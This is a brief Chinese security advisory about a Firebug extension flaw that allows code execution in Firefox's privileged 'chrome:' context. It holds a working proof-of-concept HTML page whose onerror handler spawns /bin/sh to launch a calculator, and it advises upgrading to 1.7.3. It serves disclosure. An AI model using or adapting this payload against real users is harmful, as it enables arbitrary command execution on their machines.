Mozilla Firefox Firebug扩展'chrome:'跨域脚本漏洞及安全升级提示
Firebug是Firefox下的一款开发类插件,集HTML查看和编辑、Javascript控制台、网络状况监视器于一体。
处理某些脚本时HTML解析器存在错误,诱使用户访问恶意站点和通过Net Panle查看HTML输出,可以"chrome:"上下文执行任意代码。
<html>
<head>firebug 0day</head>
<body>
<img src=2 onerror=var file = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);file.initWithPath("/bin/sh");var process =Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);process.init(file);var args = ["-c", "gcalctool"];process.run(false, args, args.length);></img>
</body>
</html>
打开Firebug,访问URL,然后打开"NET" -->URL-->"HTML",可执行gclctool。
安全建议:https://addons.mozilla.org/en-US/firefox/addon/1843
升级到1.7.3
- 上一篇:vmware esx集成AD域认证
- 下一篇:Linux入门常用命令
相关文章
图文推荐
-
在CentOS6.x下安装Compiz——桌面立方体,特效种种
-
利用U盘安装windows7
-
sqlserver查询数据可编辑方法
-
Android RoboGuice使用指南(7):@Provides Methods
- 文章
- 推荐
- 热门新闻